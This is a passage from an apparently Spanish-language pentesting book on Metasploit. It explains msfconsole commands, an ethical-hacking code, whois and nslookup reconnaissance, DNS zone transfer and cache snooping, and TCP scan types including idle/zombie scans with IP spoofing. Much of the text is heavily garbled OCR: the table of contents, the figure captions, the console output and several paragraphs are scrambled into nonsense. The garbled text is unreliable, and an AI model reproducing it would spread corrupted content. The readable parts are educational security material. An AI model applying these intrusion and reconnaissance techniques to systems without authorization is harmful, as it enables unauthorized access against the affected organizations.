Piensa) eC ore te ead Pe tao PE ee es Metasploi il aT a Ce eu edeIndice a indice tale Caneepon bis nn 1 Define as - ‘Softwa abl w Suva sg ee =e bg. — = spit ———— Papo CIO i Silos — 2 = Day expo ae : ey} ‘Sule Overt —— : = a SQLneetor E ~ Ht XS8 (Crow Se Siping = Mt Maan 2 ———— Is Matas. = : ears Ini: ative : ——— 1b eran dl fama nnn = 1 Artes de Metasploit. = - 9 ‘ips de mle Mepis mews. — 7) {Loki de Mata. 7 es 2 a 24 Meas PID nnnnrnnnn nnn 22 Maaspi pes e == 22 5. Bex dino pnt 7 2s 4 Paes dele de isin. ames ey contac y nis le de iin Ssaemetas ee ~ as Anis yl = CS ~ 2s pin des volatilities = 26 Posespiai el site scam eee (Genes de lone = 7 5 .Commdes iss de Mes nnn un (Comatos de ajay biseda. nnn 29 Crs einterctién yeoniguaiin. Ie Conn base de dite a aM 6.NE Bist ” Capt Prelit nnn i Aros eee 2 tecogie de foun - - “Teens paiva. = = Teco acti aes 2. Bones de lb Bea Coup en fers de foam de nro 5h ane nems hapitlin be hte enaenennnnesrsnnros Ze Bdaer MUSA cimporicin de duos — os Tenis Aopen, ee = osMetasploit para Pentesters 4. Pein ido ee = ew ae Heenan a _ “ eran ainy ea Mp. = - 2 0 Capito MES ace de antes, nm Anti . a ~ 88 2s, - - a) nua sin raion - aaa oe La prin ah ~ a we Dene devi pio = ne) Inui in iri — 7 co os Lancia eta aoe sry pelea, Sn ois eoenne or Rabe Seana : 4 Dk Sos, ond ey al queen 0 Laden wet Aap y asi acurre con ls dems tipos de médulos de fos que se dispone en el framewort. Para acceder y obtener informacién a exploits, encaders, payloads, ee, se dsponen de cierlos ccomandos que se irin explicando a continuscién, pero ante, hay que destcar fo que son los elementos el framework, Se pueden entender como varahles ques2 dahon canfigurarenel interior de un exploit w otros médulos con los que se tabaje. Es decir, cuando se quiere canfigurar un exploit, 0 un encoder payload, etcétera, se disponen de unas vatiables que deben ser configuradas ‘con informacién aportada por el auditor. Por ejemplo, sis est configurando un expoil que se va fanzar contra un equipo, exstenciertas variables o parimettos que deben ser propercionados pore ‘uitor como son ta direccién IP o nombre de Ia miquina sabe la que se lanzard el exploit, puerto de destino, confguracién det payload, en el casa de que se intente provecar la ejecucién de cédigo ‘emoto y tomar el conto! dela maquina. Estos elements o variables se muestran en maytisculs, algo que llamara ta stencién dl auditor. Algunas variables son opeionales y otras son totalmente obligatoris de configura fa wie elo oT ime arm Stig id ne ‘eo tea ead eat at ni Fig 1.10: Vai un nla eee, Capitulo 1. Conceptos bisicos a Comandos de ayuda y bisqueda Exiten numero comandos de msfsoaole los cuales proporcionan ayuda al usuario dando informcidn sobre cones ques pooden eliza cone famevor-cinfonnacionsbreles los Alspnibles, Aden, esl de wan uid lo commandos pra wala bisqudes dato Ye lo strc de Metasploit, Comando: help El comando hel proporciona un lstado sobre todos los comands dle consol disponibies, St pueden observar? lista diferenciadas, core commands y database backend commands. La primera proporciona un listado sobre los comands de niceo del framework, a segunds ofece acu sure los comandos que interactan con las bases de datos. Existe la posibilidad de usa el parémetro ~ con los comandos para obtener una aytuds detalles sobre la uilizacin de dicho comando. Por ejemplo, search, a inchiso utilizar el comand help Adelante del comando del que se quiere informacin 0 ayud, help search ‘Comando: search Fl comando search resulta de gran wilidad para el auditor par a bisqueda de meédulos en funcién de alguna carcteristica concreta. También se puede utilizar cuando el auditor Lene que comprobar sielramework se encuentta actualizado, por ejemplo mediante la bisqueds de algin exploit que se aproveckie de alguna volnerabilidad conocida recientemente. fa > sear proce [91 Seatehingtoaies sods for potter ‘pacxec... lsptotts ne Disclosure Date Rank nescripticn Vindows/subvpsexce i899-01-01 monunt—_—icruoTt Wines Authenticated User Cae €| lection dins/sbysab relay 2901-83-31 __exceL.ent_icrosft Winks S96 Relay Code Eacution Fig: Biqunda de més oe cna anes. Come se puede observa tas realizar la bisque de wn médul con cet earactrstcus se oblienen Ins russ donde se alpjan y donde se puede accede al recurso. Ea et eempl, se puede visualzar com se obienen exploits, per i exsiese herranientas, payloads encoder que cups con ! patn de bisquedatambign se obtendran sus rus para que el autor pudiraaccedera lias de miner sencilla ‘Comandos: info y show El comando info aporta gran canided de informacién sobre el modulo sleccionado previamneate «en a consola mediante el comando use, oejecutando el comando info seguido del cla dénde se encueatra el médulo coneeto del que se equiere obtener informacén, Los datos que devuelve ela Mezpli para Ponesters ‘omnia info son todas las opciones del médulo,objetives y una descripcién. Por ejemplo, en el «aso de fa mayoria de exploits se describe la vunerabilidad y is versiones vulnerable, Fl comando show permite mostrar fas diferentes opciones para los meus del ameworky todos los exploits, payloads, encoders, nop, hetramientas, etc. Cuando se encuentra seleccionado un sidulo, mediante ef comando use, show dispone de algunas scciones mas como es fa muestra de ‘a variahles configorables en el médulo, show options, ols sistemas operatives vulnerables, show gets, entre otros. > ew show alt” show encoders show mops show payloads show post show auxitiary show exploits — shaw options shaw plugins last > use exploitymutti/browser/ java, signed applet last exptott java signed applet) > sho Siow actions” how aviitiary. show exploits show peyloads show targets Jsiow advanced shaw encoders’ show nops. show plugins show at show evasion shaw options show post Jct exptotetjave_ signed applet) > show ig .12: Show enfin del ito con ms opc Comandos de interaccién y configuracion La mayora de les comands que se dsponen en msfeonsle son de ineracién y configuracin. ios comandos van dese la simple nvegaciin po la heramiet, hasta ejecci de un expo com su previa configura, Comande: use El comando se permite seleccionar ef médulo, «lo largo de Ta extructora de diretorios det {ramework, que se require. Una vez se ha encontrado una vulnerabildad en un sistema, puede realizar la bisqveds de ta misma mediante el comando search os se eonoce la ruta dinde se aja 1 médulo, dreetamente cargarlo, Un ejemplo seria use exploitrmulti/handler. Comandos: back, set, setg, unset y unsetg Exist comandos art ta configurecib de valores en fos méuuios que el auditor neces pecsonlizar para el test de intusién, Adem, se ha visto como el comand use permite acceder a talon concretes, pero se augitorreuiee volver até, de qué comonde dspone? El comando ‘ck permite a autor salir del méduloy colocarse de mevo en la rai de ln consol |.os comanos sey sefg apotan una funcionaidad imprescindible para el test de intrsiéiny es la Dosiildad de configurar tos parémetros de los distintos médulos. Es deit, con estos pardmeros se asignarén valores alas variables que por ejemplo definen un exploit, connect 157Tor is} Comected to 182 Ieicrasore winds (Versi¢nf.1. 7683) lcsayriant (c) 200 wicrosoft corporation. Reservatos tedos los derechos lcvusers\pitsroan oan bitepevpabio ig 13 Cone edie cone coun gun Mo {81 comando rb permit al auditor ejecutar wn ntéanete de Ruby parcel framework de este manera se pueden ejecuiar comands y rear scripts que automaticen cittaspracesos, todo ello en caliente, ‘Esa funcional es interesante para conocer Ia estructura interna éel framework, Se ecomenda ‘conocer el lenuaje Ruby para wblizarcorectamente este interpret, ‘Comandos: load, unload y tondpath ‘Metasploi en su estructura interaedispone de una carpta dénde aja los plugins. El eomando load permite espeificar qué plugin se quire cargr Pr lo que sie afaden nuevos plugins al framework se deberinalmacenar en dichaeareta, Por oro ldo, si se quiere quite ua plgin del entoro se lilizaré el comando tnd. ‘| ‘También se dispone de un comand al cual se le especifica un directorio dénde se pueden encontrar slmacenados médulos, plugins 0 exploit exteros al ramework, y disponet de Oday, exploits payloads, en un directorio de trabajo independiente farts Tot ae fe} wu to} = ot (| wetasploit.con 2011 9} suceessiutiy eoted plugin: aap last > ig Capt plane ol fone132 | Metasploit para Pentesters Comandos: check, exploit y sessions Cuando ef auditor se encuenta en Ia fase de explotacién, es decir, ya ha encontrado lao las vulnerabildades por dénde atacar al sistema, el comendo check aporta la posibilidad de verificar si el sistema es vulnerable 0 no, anes de lanaat el sep. £1 comando exploit lanza, una vez configured el médulo seleccionado; el digo malicioso sobre ‘una maquina o prepara el entorno para que una maquina sea vulnerada sl acceder aun sito ea Ia rd El comand dispone de varios partmetrs interesante los cuales se espeifican en ls siguiente abl Pardmetro Deseripeidn i El explores ejecutado en segundo plano 2 [Nose interact con Ia sein ras una explotaci6n exilosa “ Se lanza el payload con la codificacin meslante un encader previamente “ils 107 Faas Slconsndo ep Por lo general, et comando exploit devolvert el control del sistema remolo mediante una shell © un meterpreter. Por Ait, las shell que se obtienen se organizan por conexiones y ésas son visuaizades por el comanvo sessions, Este comando permite lista el nimero de eonexiones con ‘viquinas vulneradas que se disponen, que via ha sido la que ha conseguido vulnerat fa mquina, informacin sobre los puertos y direcciones IP, el ipo de payload etc, Es importante entender que las sesiones enen un ideniiesdorGnico y que se debe especiicar dicho ideatificador cuando se ‘quiere interactuar con una sesién remota. Los idenlificadores son nimeros enters, la primera ssion abierta dispondré del nimero | y van aumentando con nuevas sesiones que se vayan consiguiendo. En la siguiente tabla se mestran los distintos parfmetros que dispone el comando sessions Parimetro Deseripeién Lista las sesiones disponibles ~ “Muesta informacion extra, es interesante utilizar junto al parémet -L Ejecula unscripr de Metasploit sobne todas las sesiones ie Meterpreter disponibles ‘Su uso seria sessions —5 Finaliza todas las sesiones sbierias u ‘jecuta un comand sobre todas las sesiones de Meterprelerabiertas, Su uso sessions ~e “ping 888.8" Uno de ios mas interesantes, permite actualizar la shell vemola de tipo Win32 un ‘Meterpreter Se debe especficar el ID de a sesiéa ‘Con este pardmeiro se le indica al comando sessions en que sesin se quiere inoractuar. Un ejemplo es sessions ~i 1 "Taba Panto dl cand aan Capitulo | Conceptos basicos EE far oT TTS oT 1 Yectyng wince sta. fitters etn > (taster decent a fo spn “ainsi Se tae (seb! to Aree sare pst fa estas) ptpt > senses <1 1 tye defen eae sng GRA re kms © rua ah 08 ig 1: Were, engl rac con aa ‘Comandos: resource y makere £lcomando retoure permite ln carga de un cher, genecalmenteespecfcado con la extensib re, Incual no es ncesria, con acconesespecfca ube el framework. Ese comand es my atlias ara automatizar areas que se deben ealizarcon Metasploit as eal se cancer deantemano o se han realizado previamene. BB comando makere almacena en un fichero el historial de comaudos y aeciones que se han realizado en la sesién en curso can el framework. Es deci, si se ‘equiere guardarel hatoial del trabajo realizado durante et dia con Medasploit, makere genera un stad con toda esa infoemnacia almacendndolo en el fichero que se le indique. Por defeto, este fchexo se genera en el hve del ‘usuario en un dretero culo devominado.msf, aunque dependrs ce la vrs de Bletayon que se estéutilizando, fs elena) > ent +] Yah ave active sesolns open, to ext anany type tense i expoteipesee) > exit 77 a ig 16 General de bisa depen ‘Comandos: save y jobs 1 comando save aporta pesistencia a Ia configuracin del enlorno. Eslo es algo realmente tit suando el test de inusin es largo y con un gran nimero de caracerstcas. El fichero con laMetasploit para Pentesters configuracién se almacena en et home del usuario en la earpeta oculta ms y tiene como nowbre config: Cuando se lanza msfeonsole, éte comprucba la existence de dlche ficheroy si existe ang la configuracién almacenada en #1 camando ob muestra losmédulos quese encuentran enejecucin cr segundo plano o back. Fste commando, adem, permite fnalizar otros trabajos que seestinejecutando en segundo plo y ienerinformacién deallada sobre fos médulas en ejecucién Comandos ran 11 comand ruy permite realizar la eeeucion de un médulo aatiany venga en el contexte de Ia cxf ; Te TT RET TT ERT 7 fr dotaiiaryizmmacs) > set TS Mp1. opees BE ext ioeyienoneoar) > 2) 138.180,8.4721 Anonymous RERD (228 PrOFTPD 3.2.8 Server (POFTPD feta jostaLocioe) (ome ‘a.m is) [s7 sens of 2 hosts (be coapte (s) sashtary aodoeexecusn cenpleted uit iarylananjeos) > B Fig 117 nan down ato elie ran ‘Comande: route ; [te comands permite enrtar sockets a sesiones, disponiendo de us funcionamient sini ccomando -wite en binnx. Aderaés, permite la adicion de subvedes, pucras de enlace © gateway: _gcaras de es, Este comando puede ser muy iil cn la enica conned coma pivoting. Comandos de base de datos ‘Metasploit permite la tifizacin de informacién almacenada entases d= dotes por otrasherramienas de recogida de informacién y anlisis. Esta funcionalidad es de gran interes en un test de intssi6n, ye que en funcidn de dicha informacién se pueden i ealzando distintssprucbas sobre los sistemas aro re ies 4a prt tte se etsy et tes laser Gcalcomect — ehoort irsees la-pore sarin Sigertete im, Ast ten Gi-ingor-nentt te aye lace rlogor-nesain st wins ln-ereste 7 -lort-tap ast Skossec | [seers git, eo | Lait host Ieart amp toy _ arise Fig 1 Comandor de Nets con mecca bse den Copitulo 1. Conceptos bésicos Ea Comando: db_driver £5 comando ch driver indica las bases de datos que se encuentran csponibles pars que Metasploit lastiliey la base de datos confgurada por defetn, Este comando germ cambiar Ia base de delos ue el auditor quiere wiz Tae eve Diver: ‘wollabie:ptstaresal, mya lst > co ariver postgres Ist son ctatate doe! postereat lst Seovdriver IP) “Retve overs postgesgt r_ daatabtes estes, aya ie 1 Eni deve Comando: db_conneet [8 comando dh connect erea y conecta con ia base de datos. Previamente, se debe confignrar ef usuario en Ia hase de datos. Este comando prepara todas fs tabla en la base de dalos que s¢ ntilizarn en la recoteceién de informacién y andlisis para almacerar los datos obtenidas de las sistemas que se estén auditando, us a fer a i et (GSH a 7 ony Ma cate tet ae ts ey for lee ‘ee Toe AN rae mL semenc eet ie er eit ero cede TLE fe A cra ete nn Plans hey tr ae eet NE WALE WI cee pitt seer “trees 4.48 a seri ealem“sere (HEE ME / RORY HEY Werte pelt Safes sree ey for tae “ert "ig 120 Crary ene on ate de aren tap Comandos: db_nmap y db_autopwn !comande ab_igy eecuta I Heramienta nmap y almacena todo ls resultados del escaneo ls nblaspreparaas en fa base de detos previamente. Ef auditor debe conocer fos ditintos ‘wodificadoreso parimeros d este escner para sacar el maximo prvecho a este proceso, Con el pacimeto fh se muestra aay de db_nmap donde se pueden consuar los dstnios modifendores Pcs los distints tos de escaneos. Hl comando db, awtopum ayuda al auditor a lanzar una colecién de exploits frente a una o varias -miquinas de tos cuales se ha obvenido informacién, como pueden ser puertos abiertos, versiones de productos detrs de diehos puetos, versiones de sistema aperatio, etcéera. Este comand es ‘onecido como la merralieta de Metayploity automation en gran parte el proceso del lanzamiento de waa frosts dares x flavor os_sp_ purgose info coments 8,08. 0.47| fon 8.0.34 PRMERAS-0L769¢C_Mlerosoft Windows PSP device Fig 2 Lino de miss unaceada ea abe 6 nos. Comando: db_destroy Tate comand elimina la base de dlos qu et tlizando en un momento dado, También se puede indicr a eliminacion de Ia base de dalos de In sigiente manera ab destroy wser;passwore@ host porlatabase. Capitulo 1. Conceptos baisicos 6. Notas éticas eee re seer narouin lvalon pea eal digo aera emai ae eee ee care nae coe peace een ca te "san pina nb coors cline epee Got eb ome sete Last ul Anis popeek Beta eaee eae Seema eee eee eee eee eee Ahora, qué ese hacking io? A lo largo del iempo, el hacker ha sido taco negativamente, por le que la vision de Ia sociedad sobre él, noes lo que su filosofia planteaba. Qui, esto ha acutido por la auioproclamacién de algunos & llamarse hackers y realizar acciones sobre sistemas con bjetivos de dudosa mora, ya sean economicos o el simple hecho de realiaar una aecién negativa sobve un usuario u oganizaci, El hacking éico nace como una meladologia en a que se intenta edueary aprovecar las cpacidades de las personas apasionsdas con la seguridad informatica. Estas personas o profesionales del sector realigarin aiaques informéticas a orpaniaaciones sin que étos sean alagues reales, es devi, se ‘comprueba el estado do seguridad en ef que se encuentra Ia orgenzscién de una manera controll. Estos profesionales deben dispouer dela ia profesional para no aprovecharsedesus conocimienos ni de as situaciones que pueden surgi. Por ejemplo, puede darse las guient stcidn: Una empresi iereauitar y comprobar hasta dénde puede gar un usuario, eon un aivel de acceso baja ier informacin de la empresa que reside en un sistema eritico de és, La empresa decide contrat «alguien que simule ser un empleado con certo nivel de acceso, y ver hesla inde puede llegar Una ver esta persovia ha logrado acceder a Ia informacié que la empresa no queria mostrar, ésle informa aa orgenizacin de qué procedimiento ha levado a cabo para lograre objetivo, La persona conteatada debe disponer de una éica profesional, ya que sila empresa contratasea alguien sin dich ‘ica, se encontravian, seguramente, con bastantes problemas de cr idencaliid, I profesional de la seguridad dispone de una tic, la cuales la maa e imagen de to su trabajo. A continuacin se exponen buenas priticas a evar a cabo en un proceso de auditora, las cuales ‘pueden ser tomadas por cualquier profesional para constuir su ig = No atecar objetivos sin el respaido de un contrato o peamiso escrito = Generar el mejor informe posible, tanto en su formato teneo, eon un proceso elaborado ¥ detallado de Ins accioneslevadas a cabo, como en su formato gjecutva, explicando con ‘gran delle los problemas de seguridad encontrados. = No realizar acciones malciosas sobre los sistemas que se estén verficand en la organizacié.En eto por Panter Capit Pretininres = ~ Hay que consderar que toda accién ‘in ne consecuencias ise realizansociones fuera del it dokcontrato se te. "n conseevencas nqfatives para el _ofesional + ise realzn acon de mae ile oso pei eter sno nest 0 denmld, luo pedo utr send cleade : = Mixima eonfidencialidad sobre Ia informacidh que se puede ir obteniendo en el proceso elas prcbas. ¢ ' Respetar Io he de los usuarios. : EL objotivo deeste libroks presenta ta herramienta Metasploit eel Ambito de los «tetuna manera ica y moral para el profesional del sector dele seguridad, - Capitulo IT _ Preliminares 1. Ambito Sn y andlisis de vulnerabilidaded rmecién proporeionar al auditor u an otumen de dls sobre la organizacin a aia Se drt un vison global de que tenis ¥ procesos seguir para ir recogiend informacién utilizando dist nto ec mierbiades propone realizar un estudio sobre posites amenazas qe pueden esi ey sistema, por lo que se ullizarén heramientas conoc Uratar de obtener vias de ataque a los sistemas, {ua fess necesito de gran paciencia por parte dl ait, no sor Is fasts ms vista delet” Ge ntsin, pera son aes essai en as que el rofeonal ee ober el sero informacion isn aeerea de om aba sus elves tn reveal preteen dl ou ke itenciones te. La ilzacinde google hacking crear naps feed dea gens under mejor a infested empresa, plnea las acinar aera _hnt Son boom tom ue poston after elaudtr iacatm sn Scio one fa elresto ce as fase dl test de inaion cert meen espande de manera distnt cuando son prepunlados por cetos pales de sd cots. debido ala implements, por ejemplo, de Ia pla TCPAP Estas repuesiag.* ‘yadan areal fingerprint con lo que se pueden decrninar versiones de sistemas spent 4 dpa acines. dems, sportindo cence, se pueden enunerr ls aplicacions de aie Snes Lesplalar pre el informe inal. Ete informe, servi a previ al mule moa ang sighlente fase de test de intrusién y contastr dca informacion,oO Metasploit para Pentesters 2. Recogida de informacion Ja fase de recog de informacién se disponen de varias tenicas 0 vias para recolectr los datos. El footprinting consiste en la basqueda de cualquier ipo de informacién pabic, la cual ha s ‘publicada a propésitoo con desconocimiento de la organizacin, Con a eaizacion de este proceso se huscardn todas as huellas posibles, desde direciones [P pertenecienes ala organiaci6n,servidores intemos, cuentas de comes de Ios usuarios dela emprest, nombres de maquina, informacion de ‘dominio, ipos de servidores, impresoras, chmaras IP, metadatos, eledtera. En conclusi6n, cualavier dato que puede resulta tl par lanza distinasataques en las fses posterioves del test de intrusion. 1 gringo x analiza sls gu jn as aus, por empl pan btn clase operate vein de ws apie, pues siete, exten de freval, Tahu eden a de onexions dere dx még, oj, cnstpay oma es rp sl eublesinient dex cones Ea proce leva a cao atts de mane feu ve dei, shane nv ues espera a apes, einen de Gh espe se pueden fri crs propedal alin sore S za na se ees dev compan pr cen area thoteviaca pai, nd a haramiens excel en preticarndgigs ue sls ave compar es ess ero negara neat en ae ‘Técnicas pasivas La recclccn de informacénpasva inca consist en descbve dls sobre ls abjeivos sa rocor los sistemas edit sin ntraccién direct obe los msmos, Se puede utizar ea vin pr ident os Hes de a ed pincpalo oes,leter Bisten varias herramientas que permiten la recolecidn de informacién pasiva, conto pueden set ‘whois, nslookup, google hacking, fuzzer,eleélera. Si se imagina un ataque conta el dominio de una empresa que contate unos servicios, el objetivo del auditor en esta fase es determinar, como pare ‘dem test de intrusin, que sistemas de I organizaci se pueden atacar. En esa fase, se pueden siescubrrsistenus que parecen de la orgaizacidn pero no Io son, por lo que se deberian descartar por encontrarse fuern del alcance de lapruebs de inteusién. Whois Las hecramientas del sistema se pueden lanzar desde una terminal de Linux o desde el interior de -nfeonsole. En realidad, cuando s ejecula una herramienta de est tipo desde msfconsoe, ésta lanza un exec del ejecutable que se requiere. Whois es una hesramienta que permite al auditor 0 cualquier usuatio realizar consultas en wna base dd datos paca determinar el propietario de un nombre de dominio o una direocin IP en Ia gran red, Inesnet. Hoy en da, existen gran cantidad de sitios web que oftecen esta disponibilidad online aportando interfaces mis amigables los usuarios. Capitulo Preliminares La informacin que se puede obtener con whois es la referente a los servidores DNS, domain ‘name system, donde se encuente alajado et dominio, y quién ese! propietacio, Ustos srvidores ‘no deberian entrar en un test de inrusi6n, por lo general, ya que se pueden encontrar era de fos Timites de lo oryanizacién, e incluso pueden ser compartidos. Sin embargo, si la orgonizacion es _rande y dispone de sus propios DNS, si puede ser facibe el intsoducsfos en un test de intrsi. isle ataques sobre ests servidores, los cuales pueden proporcionar gran canlidad de informs «incluso mapas dese interns ae nearer FPF cae eine co tit ae. wan cane Fig 20: een de whol sobre un Joie Nslookup sta herramienta permite, eate otras cosas, veificar si el sevidor DNS sli resolviendo corectamente los nombres de dominio y las dreciones IP. Exist una versién tanto para sistemas ‘operativos Windows como para sistemas busados en Unix. Esta aplicacion pregunta al servider DNS port informaciéa que ésedispone en sus regstos. Las consullas pueden ser globales oespefficas hacia un servicio en concreto, por ejemplo, si se requiere resolver dénde se encuentran los servidores de correo de una organiacidn, o cuales sony dnde se ‘enewearan los servidores DNS, si dispone de alguno mis u obtener a dreecn IP del servidor web nde se encuentra alojada el sitio web, eletera “Tras lanzar la apicaciGn, ya sea en Windows o Lim, se disponen de distintos comandos para configurar a nslookup y que Ee realce las petciones como se requiera. Uno de ls commandos que ns juego aporta es ser, con el que se configurarén las peticiones y In informacién queserecogers de Jos servidores DNS. Por defecto, tas arrancar I plicacion nslookup envia as petciones al servidor [DNS configurado en la eonesidn a Internet. Exist el comando server con el que el usuario puede ‘specifica a qué servidor DNS quiere enviar las peticiones. Para consulta nformacidn sobre un dominio, simplemente hay que escribir el nombre del dominio, por ejemplo informaticaé.com, en la consola que abre nslookup. Para abtaer ol MAximo de informacib sobre el dominio se puede utliza la sentencia ser g=any para Ia Vion basada ena _Metosplot para Pentesters Uniry set qa! para la versin basada en Windows, Ahora si se ejecta la sentenci anterior donde fe pregunia por informacn de un dominio, se abtende bastante mis informacién, como puede ser nomires de dominio de los servidores DNS, servidores de coureo,servidor del sitio web, diceccin de cotre del administrador, tetera, Inaeser¥er © es ioraatlea co | ig 2. Rewind serena ‘Transferencia de zona Los DNS permiten dividir ef espacio de nombres en diferentes zonas, las cunles almacenan informacion de nombres de uno o més dominios El origen autorizado sobre un dominio es In zona en In. que se cneuenta dicho dominio, es deci, es el encarad de Ia informacién acerca de dicho dominio. G5 extremadamente importante que fas zonas se encuentren disponibles desde distntos seividores DNS por eras de disponibile. ) ) oe ip 203 Eo de oe Capitulo IL Preliminares Eg ‘Las transferencias de zona se crearon para que otros servidores, servis del pricipa, pues ° shar ones epcando ta a ntact ena sce en eas Coo it evo evr DNSy secon en 2 + Cuando fin existe el plazo de aotualizacién de una zona = Cuando se produce algin cambio en una zona yes necesiioactualizar par la replicecénm de Jos cambios ‘Cuando manualmente se solicits la transfeeneia de zon Bl igi go iz eden nb ein a in cine 0 ogy of concep, PoC, dela transerenci de zona. En primer liga, ns lazatrlookip en un ond of modifier la informacion que se quiee abner cone so del oman st qn, Acontincin@) se inece el dominio sobre el que se quer comprobar sexi ransferencin de oa. Fig2.0¢ Conic loi an par antec de es Una wea qu dpe le serviores DNS de a ogrizain s tit el comand saver para cambiar el servidor DNS al que se realizavin le consuls con nslotp. Una vez realizadst esta aceidn se utilizar el comando is y el dominio sobre el que se tequiereinformacién, si ese servidor DNS tiene activa la transferencia de zona se obtendr gianeantidad de informacién, qv, seguramente la empresa no quiera que se visible o na sabe que es visible, En bastante ocasiones,' 5 una mala configuracién on descuido del administrador el que provoca esta situacibn . Fi,205; Conse: Gade frien on ranfrance de. Exe tipo de ataque se enmea tambien la fase de descubrimient y recolecién de inom DNS caché snooping, nore rea dela ulerbilided es une nica que permite uit one Jos stntos nombres de dominio que hd sido esuelias pore serv dor DNS y cuales P28a4 | Metasploit para Pentesters El servdor DNS con esa vulnerabildad est proporcionando informacin sobre la red al atacante, ‘oen este caso al auditor, Esta fuga de informacion puede ayudar aun atacante a estudiar y expotar de manera eficiente otras vulnerabilidades. ‘Técnicas activas Las ténicas ativas para recoleccién de formaci6o consisten en interatuardiectamente con los siemas para aprender mas sobre su configuraciéa y comportamiento, Llevarn a eabo un escaneo ‘de puertos para el estudio de los posibles puerios abiertos que se encuentren y determinar que seivicios se estén ejecutando, adems de la version del producto que se encuentra detris del puerto los sistemas cada puerta que se encuenr abieto de una via de explolacin al auditor, por fo (que esta informacin es muy valorada en esta fase, Hay que conocer los ipos de estancos que ‘se encuentran disponibles y saber configura la herramientas para poder obtener el miximo de informacién posible, Hay que ener euidada con los IDS(Innrasion Detection System), y firewalls ‘que se pueda encontrar en el anilsis de puerts.. Tipos de escaneo Eisen gran cantdad de tipos de escaneos, con diferentes objetivas. A continvaion se van acstudiar 4os mismos, Hestamenis como nnapdisponen de gran vesatilidad y psibildad de configuracén, cs recomendable esudir el uso y configuracin de esta potent herraienta, Half Sean . ple tipo de escaneo consiste en realizar el procedimiento tiree-way handshake sin conclu por completo para no crsar uns conexiés. Bn otras polabres, el emigor envia un SYN para iniiar ‘conexin, si el receptor envia un SYN+ACK significa que el puerto se encuentra abierto, entonces el emisor envia un RST+ACK pa fnaliza a conexin, en vez de un ACK que seria fo nocmal para ‘rea Ia conexida, La viabilidad de este tipo de eseaneo es alta, con gr fabilidad en su ejecucién. fadlantt sorerten pts (tay somes fe ‘NE Seeger ceri te Fig 26 Euan de ip af acon Capitulo I. Preliminares Metasploit dispone de un médulo de tipo auxiliary para realizar este ipo deescancos. El médulo se encuentra en la rula aurliaryYGcannerfpoiscan/ep. Al mitar ls opciones se puede configura: las tircciones IP a escanear el range de puertos que se analizaén, ls variable poupie nde se puede jndicar la tuta de une caplura de ed con fa que el médulo proces la informacin y la muestre, ek rimeou, eteéieca, Este pequefio médulo es bastante dtl para realizar este tipo de escane. ACK Sean La fnaldad de este escanco es ditinta, no es determinar si un puesto se eneventsa abiesto 0 no, si to si ut equipo de la red escucha las peticiones a través de un firewall. El emisor envia uv pagquele ‘eon en ACK attvo, el receptor debe responder con un RST esté el puerto abierto 0 no, sin existe respuesta os que hay un cortafuegos en medio de la eonunicacibn ‘Metasploit dispone de un médalo, como el anterior de tipo auxiliary, para evar a cabo ese tipo de tscaneos y pruchis sobre equips remotes y fa comunicacin con étos. El médulo se encuentra eo Ja uta ausiiaryscamer*portscanfack. Al inira as opciones se pueden configurar ls dreeciones IP ‘a escanear, el rango de puertos que se estuiarén, ene otros valores intresuntes Null Sean Bate tipo de escaneo tiene una caracteritica curios y es que el paquete ue se envia no contione hingin bit activo, El emisor envia este tipo de paquetesy si el pueito se encuenta abieio no se recibiré nada, si por el contraro el puerto se encuentra cerrado se envia un RSTHACK. Es por tla, que normalmente se puede encontrar en oos libros que este tipo de escanen tiene come fin tveriguar cuales son los puestos TCP cenrados, Xmas Sean Este tipo de eseaneo tene en sus paquetes lus bits de eontulwetvos. Findon, por detect, responde a est tipo de paquetes, peco antiguamente Ix pila TC7/P, respondia con un paquele RST+ACK cuando el puerto se encontraba cerrado, mientras ques el puerto se encontraba abierto no se respondia, La viabilidad de este tipo de escanens na es ni mucho menos ptm, inelindndose hacia una vibilidad mate: ‘unklary (ans) > Shaw options aste options (abeitary/scanner/portscn/aas) we Current Setting Required description iwiaisre 8 The umber of poste to sean par set EtAc The fame of the interface fous 31008 arte to sean (e.g. 2-25,0,118-99) ests 192 108.1.38 ‘he target adress rage eh CIDR Lente sarten ‘he nme of Byes to expt ims he mater of conerent threats he reply rnd tient in lltlseconis ig: Malo sma aulry de Meege Metasploit para Pentest Metasploit digpone de un mésulo, de tipo auxiliary, para Hevar a cabo eae tipo de escanen. Este ‘mésjlo st encuentra en Ia ruta auailloryscanneripriscanismas, Las opciones que dispone son Precis als det mBdulo de escaneo de tipo ACK. FIN Scan "ste tipo de eseaneo consiste en a ereacién de un paguete TCP con el bit de FIN activo, Fl emisor envi el paquetey sel puerto se encuentra aberto nose oben respuesta, sn embargo, sil puerto se encuentra cerado se recibirt un RST#ACK. El objetivo finalcnd de este tipo de escanea es ‘6c al wolf scam y xmas sean, incluso algunos autores fs agrupan como eseaneos de detecciin ‘de pris cers a ests tipo, Connect Sean Es untipo deescaneo antigua y quiz uno de os menos originales fos que se han podid este «en este libro, Su fancionamient eset siguiente, en primer lugar se realiza el proceso completo de ‘ivee-svay handshake, ereando una conexién entre 2 méquinas si el puerto se encuentra abiere en ‘ miquina vietiona. Una ver que ln conexién se encuentra establecda cl servicio que se encuenta ‘ets de dicho puerto se identifica enviando el banner del servicio. En este punto el emisor envi un ACK y poriitimo un RST+ACK para forzarel cere de a canexién. Se puede obtener dems de fa conclusidn de que el puesto esti abierto ono, In identfieacién del product y la version del servicio, late Se Este escaneo es uno de fos mis complejos y su eficacia depende de Ia méquina eegida como zombie {nel escenario hab al menos 3 miquinas una esl del aacante tea seréla zombie a intermediaia 1 a iltima fa vietima, La mquina del atacante debe chequear que el zombie tlie un algoritmo Dreveeihle pore marear los paquete TP. Pare averiguar ste detalle clemson w ataante envi varios -nnguetes con SYN¥ACK para iniciar una conexién El objetivo es oblener RST y chequear que los 1D de ls respvesas sean sucesivas opredecibes. También se debe verifier que le miquina zombie ho eséteniendotrifico, ya que si no el proceso sera inviable, Cuatido el atacante haya encontrado una méquina zombie que pueda ser wilizad, el alacanteenviars Paquetes SYN ala miquina victims haciendo 1P Spoofing. Los paquets enviados desde Ia mdquina ‘alacant, con fn direcci6n IP de la maquina zombie, Ia vietima son en reali un sean normal. La tlereneia se enewentr en que ls respuesta deta vietima iin destnadas a la maquina zombie, por |n suplantacn de 1Prealizada por el atacante, CCoando In vieimm conteste a la petcién SVN, devolverd un SYN+ACK si el puerto se encuentra ubiero o un RSTHACK si el puerto se encuentra cerrado, Cuando ia méquina zombie recibo un 'SYNFACK enviaré un RST aia maquina victim Si fa méquina zombie cecibe un RSTHACK, se declarant como tific muloy se descartar, Tas esperar un corto periodo de tiempo el atacante pregutard por 